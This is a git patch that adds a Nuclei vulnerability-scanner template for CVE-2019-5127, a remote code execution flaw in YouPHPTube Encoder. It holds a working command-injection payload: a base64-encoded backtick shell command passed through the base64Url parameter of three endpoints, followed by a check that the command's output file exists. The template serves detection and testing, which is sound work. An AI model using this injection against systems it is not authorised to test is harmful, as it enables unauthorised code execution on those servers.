From 0ae26b59643e2ff84b50bfe39da6b22170348e90 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Feb 2021 11:03:39 +0000 Subject: [PATCH] Added (CVE-2019-5127) YouPHPTube Encoder RCE (#811) --- cves/2019/CVE-2019-5127.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2019/CVE-2019-5127.yaml diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml new file mode 100644 index 0000000000..be37d16bbc --- /dev/null +++ b/cves/2019/CVE-2019-5127.yaml @@ -0,0 +1,34 @@ +id: CVE-2019-5127 + +info: + name: YouPHPTube Encoder RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127 + tags: cve,cve2019,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127 + - "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128 + - "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129 + headers: + Content-Type: application/x-www-form-urlencoded + - method: GET + path: + - "{{BaseURL}}/objects/nuclei.txt" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: regex + regex: + - "uid(.*)" + - "gid(.*)" + part: body + condition: and + - type: status + status: + - 200